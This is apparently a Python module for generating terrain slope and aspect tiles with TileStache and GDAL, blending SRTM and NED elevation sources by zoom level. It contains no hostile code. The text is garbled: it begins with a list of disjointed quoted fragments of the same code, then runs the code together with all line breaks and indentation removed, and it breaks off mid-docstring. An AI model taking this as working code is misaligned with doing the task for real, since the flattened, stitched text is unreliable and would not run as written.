- 2, elevation.shape[1] - 2 window", "+ window[6]) \\ - (window[2] + window[5] + window[5] + window[8])) \\ /", "zoom level. Each data source is a module such as SRTM1 or SRTM3,", "external function based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname =", "1 # # Set up some useful projections. # osr.UseExceptions() # <-- otherwise", "\"\"\" TileStache provider for generating tiles of DEM slope and aspect data. 
Source", "providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source ==", "preparing tiled data. Intended for use in hillup-seed.py script for preparing a tile", "zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks", "aspect data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for", "0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians", "Box is a 4-tuple with left, upper, right, and lower pixels. Not yet", "to pi/2 for flat ground. Aspect is returned in radians, counterclockwise from -pi", "# # Keep a version of the composite without the # current layer", "elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z * elevation[row:(row + height),", "proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' '''", "1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3,", "modules[modname] _func = eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s", "(default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider object interacts", "= modules[modname] _func = eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in", "arrays 2 pixels smaller than the input elevation array. Slope is returned in", "yres = (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin", "ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width,", "top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom,", "NED100m, NED10m bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m,", "= tmpdir self.demdir = demdir self.source = source def getTypeByExtension(self, ext): if ext.lower()", "methods. 
This object knows only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers", "elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers =", "= Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider", "Calculate and save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres)", "gdal.GRA_Cubic else: # cubic spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem,", "right, and lower pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\"", "array. Slope is returned in radians, from 0 for sheer face to pi/2", "Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import", "ds_dem in module.datasources(*ds_args): # estimate the raster density across source DEM and output", "estimate the raster density across source DEM and output dem_samples = (maxlon -", "or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom", "raise Exception('File format other than TIFF for slope and aspect: \"%s\"' % format)", "assert srs == webmerc_proj.srs # <-- good enough for now if self.source ==", "> 0 and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args =", "minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect = aspect", "= float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom)) / difference", "from PIL import Image import numpy from .. 
import save_slope_aspect # used to", "[(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top =", "xres, ymax - yres) # # Keep a version of the composite without", "# http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some useful projections. #", "Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self):", "width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0)", "from os import unlink, close from itertools import product from tempfile import mkstemp", "- float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width,", "- proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with,", "import Image import numpy from .. import save_slope_aspect # used to prevent clobbering", "data source is a module such as SRTM1 or SRTM3, and the proportions", "= wkt self.xform = xform def save(self, output, format): \"\"\" Save a two-band", "counterclockwise, from -pi at north back to pi aspect = numpy.arctan2(x, y) return", "gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds", "from TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo import gdal, osr", "is a module such as NED10m or NED1km, and the proportions must all", "from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk", "# # Set up some useful projections. 
# osr.UseExceptions() # <-- otherwise errors", "choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers", "= self.slope.shape self.wkt = wkt self.xform = xform def save(self, output, format): \"\"\"", "height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax -", "from -pi at north around to pi. Logic here is borrowed from hillshade.cpp:", "< NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks terrible bottom, top", "ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate", "= None # # Perform alpha-blending if needed. # if do_blending: proportion_with =", "composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in", "See http://tilestache.org/doc/#custom-providers for information on how the SlopeAndAspect object interacts with TileStache. \"\"\"", "height), col:(col + width)] for (row, col) in product(range(3), range(3))] x = ((window[0]", "xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better squeezing down", "clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up", "SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return", "providers = choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)] elif self.source", "given zoom level. Each data source is a module such as NED10m or", "window = [z * elevation[row:(row + height), col:(col + width)] for (row, col)", "= 1. - (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top, 1", "Each data source is a module such as NED10m or NED1km, and the", "the input elevation array. 
Slope is returned in radians, from 0 for sheer", "the raster density across source DEM and output dem_samples = (maxlon - minlon)", "aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect", "height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir,", "/ ds_dem.GetGeoTransform()[1] area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels:", "source is a module such as NED10m or NED1km, and the proportions must", "NED1km, and the proportions must all add up to one. Return list has", "# SRTM1 looks terrible bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom:", "gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform alpha-blending", "if needed. # if do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without", "top = NED1km, NED100m bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom:", "area_pixels = (xmax - xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic", "is a module such as SRTM1 or SRTM3, and the proportions must all", "xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for requested area. \"\"\"", "for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon", "up to one. Return list has either one or two items. \"\"\" if", "looks terrible bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m,", "- xmin) / composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better squeezing", "is returned in radians, from 0 for sheer face to pi/2 for flat", "Return an instance of SlopeAndAspect for requested area. 
\"\"\" assert srs == webmerc_proj.srs", "http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some useful projections. # osr.UseExceptions()", "of the desired extent and projection. # xres = (xmax - xmin) /", "projection. # xres = (xmax - xmin) / width yres = (ymin -", "= tmpdir self.slope = slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt", "return [(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom", "col:(col + width)] for (row, col) in product(range(3), range(3))] x = ((window[0] +", "Source parameter can be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on", "the SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt,", "with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with", "output, format): \"\"\" Save a two-band GeoTIFF to output file-like object. \"\"\" if", "see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some useful projections.", "area. \"\"\" assert srs == webmerc_proj.srs # <-- good enough for now if", "xmin) / width yres = (ymin - ymax) / height area_wkt = webmerc_sref.ExportToWkt()", "module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came up None' %", "+ xres, ymax - yres) # # Keep a version of the composite", "such as NED10m or NED1km, and the proportions must all add up to", "product(range(3), range(3))] x = ((window[0] + window[3] + window[3] + window[6]) \\ -", "# <-- good enough for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom)", "def save(self, output, format): \"\"\" Save a two-band GeoTIFF to output file-like object.", "two-band GeoTIFF to output file-like object. 
\"\"\" if format != 'TIFF': raise Exception('File", "proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds =", "tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.')", "module = modules[modname] _func = eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s)", "ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of", "SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 #", "self.source == 'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide': providers =", "+ window[8]) \\ - (window[0] + window[1] + window[1] + window[2])) \\ /", "return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax, zoom):", "Perform alpha-blending if needed. # if do_blending: proportion_with = proportion / (proportion_complete +", "ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for requested area. \"\"\" assert", "and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top = NED100m,", "Intended for use in hillup-seed.py script for preparing a tile directory. \"\"\" def", "getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self,", "0, ymax - yres, 0, yres # # Reproject and merge DEM datasources", "proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with +=", "proportion = 1. - (zoom - float(bottom.ideal_zoom)) / difference return [(bottom, proportion), (top,", "cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z = cs2cs.TransformPoint(xmax + xres,", "how to save two-band 8-bit GeoTIFFs. 
See http://tilestache.org/doc/#custom-providers for information on how the", "to one. Return list has either one or two items. \"\"\" if zoom", "def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename", "'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)]", "webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing", "top = NED100m, NED10m bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom:", "window[5] + window[5] + window[8])) \\ / (8.0 * xres); y = ((window[6]", "import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config", "level. Each data source is a module such as SRTM1 or SRTM3, and", "+= composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0) proportion_complete += proportion elevation = composite_ds.ReadAsArray()", "Returns a rectangular region from the current image. Box is a 4-tuple with", "Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches import Disk from osgeo import", "lat/lon bbox buffered by one pixel on all sides minlon, minlat, z =", "self.h = self.slope.shape self.wkt = wkt self.xform = xform def save(self, output, format):", "slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax, 0,", "import unlink, close from itertools import product from tempfile import mkstemp from sys", "ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres,", "to output file-like object. \"\"\" if format != 'TIFF': raise Exception('File format other", "Tilestache-compatible seeding layer for preparing tiled data. 
Intended for use in hillup-seed.py script", "SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and crop() methods. This object", "source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF'", "NED10m.ideal_zoom: #bottom, top = SRTM1, NED10m # SRTM1 looks terrible bottom, top =", "and aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope = slope", "looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem", "choose_providers_srtm(zoom): \"\"\" Return a list of data sources and proportions for given zoom", "tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle)", "+ window[7] + window[8]) \\ - (window[0] + window[1] + window[1] + window[2]))", "cos from os import unlink, close from itertools import product from tempfile import", "information. \"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect = aspect self.w, self.h", "proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0,", "math import pi, sin, cos from os import unlink, close from itertools import", "\"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended for use in hillup-seed.py", "borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] -", "import mkstemp from sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP,", "interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate", "load_func_path(funcpath): \"\"\" Load external function based on a path. 
Example funcpath: \"Module.Submodule:Function\". \"\"\"", "return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\" Return a pair of arrays", "+ window[8])) \\ / (8.0 * xres); y = ((window[6] + window[7] +", "requested area. \"\"\" assert srs == webmerc_proj.srs # <-- good enough for now", "composite without the # current layer applied for later alpha-blending. # do_blending =", "needed. # if do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without =", "be \"srtm-ned\" (default) or \"ned-only\". See http://tilestache.org/doc/#custom-providers for information on how the Provider", "'TIFF': raise Exception('File format other than TIFF for slope and aspect: \"%s\"' %", "format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns a", "bottom, top = SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] #", "0 for sheer face to pi/2 for flat ground. Aspect is returned in", "window[8]) \\ - (window[0] + window[1] + window[1] + window[2])) \\ / (8.0", "% format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self, box): \"\"\" Returns", "'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod,", "DEM and output dem_samples = (maxlon - minlon) / ds_dem.GetGeoTransform()[1] area_pixels = (xmax", "on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres)", "width, height = elevation.shape[0] - 2, elevation.shape[1] - 2 window = [z *", "be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer", "Provider(self, demdir, tmpdir, source) def name(self): return '.' 
class Provider: \"\"\" TileStache provider", "xres, xres, 0, ymax - yres, 0, yres # # Reproject and merge", "[(NED10m, 1)] difference = float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom -", "= mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform)", "wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif')", "\"\"\" Load external function based on a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname,", "top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom", "with PIL-like save() and crop() methods. This object knows only how to save", "= NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference = float(top.ideal_zoom)", "_func = eval(objname, module.__dict__) if _func is None: raise Exception('eval(%(objname)s) in %(modname)s came", "elif SRTM3.ideal_zoom < zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1", "TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from", "minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the raster", "proportion_with = proportion / (proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with", ".. import save_slope_aspect # used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html", "* -9999, 0, 0) ds.GetRasterBand(1).SetNoDataValue(-9999) return ds def calculate_slope_aspect(elevation, xres, yres, z=1.0): \"\"\"", "smaller than the input elevation array. Slope is returned in radians, from 0", "from 0 for sheer face to pi/2 for flat ground. 
Aspect is returned", "a path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module", "source is a module such as SRTM1 or SRTM3, and the proportions must", "= demdir self.source = source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise", "= cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep a version of", "if dem_samples > area_pixels: # cubic looks better squeezing down resample = gdal.GRA_Cubic", "aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform = xform def save(self,", "1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data sources and", "((window[0] + window[3] + window[3] + window[6]) \\ - (window[2] + window[5] +", "bottom, top = SRTM3, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)] difference", "datasets of the desired extent and projection. # xres = (xmax - xmin)", "SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended for use", "== 'vfp': providers = [(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide,", "suffix='.tif') close(handle) ds = driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height),", "= choose_providers_ned(zoom) elif self.source == 'vfp': providers = [(VFP, 1)] elif self.source ==", "TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array", "xform): \"\"\" Instantiate with array of slope and aspect, and minimal geographic information.", "data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\". 
See http://tilestache.org/doc/#custom-providers for information", "for (mod, proportion) in providers]) == 1.0 # # Prepare information for datasets", "driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename,", "def __init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array of slope", "pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list", "# in radians, from 0 to pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x +", "and save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform", "__init__(self, tmpdir, slope, aspect, wkt, xform): \"\"\" Instantiate with array of slope and", "generating tiles of DEM slope and aspect data. Source parameter can be \"srtm-ned\"", "for information on how the Provider object interacts with TileStache. \"\"\" def __init__(self,", "and proportions for given zoom level. Each data source is a module such", "# if do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without = 1", "NED100m.ideal_zoom: return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom,", "from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] - 2", "= gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. 
for", "VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import", "(module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref) # get a lat/lon bbox", "\"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(),", "slope, aspect def load_func_path(funcpath): \"\"\" Load external function based on a path. Example", "+ window[7] + window[7] + window[8]) \\ - (window[0] + window[1] + window[1]", "= slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt = wkt self.xform", "from the current image. Box is a 4-tuple with left, upper, right, and", "import NED10m, NED100m, NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from", "= NED100m, NED10m bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return", "return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a list", "return '.' class Provider: \"\"\" TileStache provider for generating tiles of DEM slope", "ymin, xmax, ymax, zoom): \"\"\" Return an instance of SlopeAndAspect for requested area.", "SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like", "pi/2 slope = pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from", "+ window[1] + window[2])) \\ / (8.0 * yres); # in radians, from", "SRTM3, and the proportions must all add up to one. 
Return list has", "ymax) / height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0,", "and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect, self.wkt, self.xform, output, self.tmpdir) def crop(self,", "[(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers])", "ymax - yres, 0, yres # # Reproject and merge DEM datasources into", "= make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in", "self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom)", "Provider: \"\"\" TileStache provider for generating tiles of DEM slope and aspect data.", "area_pixels: # cubic looks better squeezing down resample = gdal.GRA_Cubic else: # cubic", "minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat, z =", "composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better squeezing down resample =", "return [(NED100m, 1)] elif NED100m.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top", "- 2, elevation.shape[1] - 2 window = [z * elevation[row:(row + height), col:(col", "only how to save two-band 8-bit GeoTIFFs. See http://tilestache.org/doc/#custom-providers for information on how", "NED10m elif SRTM1.ideal_zoom < zoom and zoom < NED10m.ideal_zoom: #bottom, top = SRTM1,", "back to pi aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\"", "buffered_xform = xmin - xres, xres, 0, ymax - yres, 0, yres #", "in product(range(3), range(3))] x = ((window[0] + window[3] + window[3] + window[6]) \\", "\"\"\" Starting point for DEM retrieval utilities. \"\"\" from math import pi, sin,", "sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres, ymin + yres) maxlon, maxlat,", "slope and aspect. 
# slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin,", "SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir, slope, aspect, wkt, xform):", "difference return [(bottom, proportion), (top, 1 - proportion)] def choose_providers_ned(zoom): \"\"\" Return a", "save() and crop() methods. This object knows only how to save two-band 8-bit", "information on how the Provider object interacts with TileStache. \"\"\" def __init__(self, layer,", "unlink, close from itertools import product from tempfile import mkstemp from sys import", "gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds = driver.Create(filename, width, height,", "to pi aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load", "= osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled", "Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] -", "#return [(SRTM1, 1)] # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif", "http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1] - 2 window =", "tempfile import mkstemp from sys import modules import NED10m, NED100m, NED1km, SRTM1, SRTM3,", "and proportion < 1) if do_blending: composite_without = composite_ds.ReadAsArray() ds_args = minlon, minlat,", "north back to pi aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath):", "Set up some useful projections. # osr.UseExceptions() # <-- otherwise errors will be", "webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data. 
Intended", "width, height, srs, xmin, ymin, xmax, ymax, zoom): \"\"\" Return an instance of", "if do_blending: proportion_with = proportion / (proportion_complete + proportion) proportion_without = 1 -", "without the # current layer applied for later alpha-blending. # do_blending = bool(proportion_complete", "yres) # # Keep a version of the composite without the # current", "slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save()", "= xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform)", "such as SRTM1 or SRTM3, and the proportions must all add up to", "+ window[3] + window[3] + window[6]) \\ - (window[2] + window[5] + window[5]", "format other than TIFF for slope and aspect: \"%s\"' % format) save_slope_aspect(self.slope, self.aspect,", "import numpy from .. import save_slope_aspect # used to prevent clobbering in /vsimem/,", "!= 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin,", "the composite without the # current layer applied for later alpha-blending. # do_blending", "None # # Perform alpha-blending if needed. # if do_blending: proportion_with = proportion", "for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only':", "by one pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin - xres,", "= driver.Create(filename, width, height, 1, gdal.GDT_Float32) ds.SetGeoTransform(xform) ds.SetProjection(wkt) ds.GetRasterBand(1).WriteArray(numpy.ones((width, height), numpy.float32) * -9999,", "= xmin - xres, xres, 0, ymax - yres, 0, yres # #", "down resample = gdal.GRA_Cubic else: # cubic spline looks better stretching out resample", "and aspect data. Source parameter can be \"srtm-ned\" (default) or \"ned-only\". 
See http://tilestache.org/doc/#custom-providers", "config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source) def name(self): return", "counterclockwise from -pi at north around to pi. Logic here is borrowed from", "+= proportion elevation = composite_ds.ReadAsArray() unlink(composite_ds.GetFileList()[0]) composite_ds = None # # Calculate and", "TileStache.Caches import Disk from osgeo import gdal, osr from PIL import Image import", "= load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in providers]) == 1.0 # #", "# current layer applied for later alpha-blending. # do_blending = bool(proportion_complete > 0", "cubic looks better squeezing down resample = gdal.GRA_Cubic else: # cubic spline looks", "demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir = demdir self.source = source def", "SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" 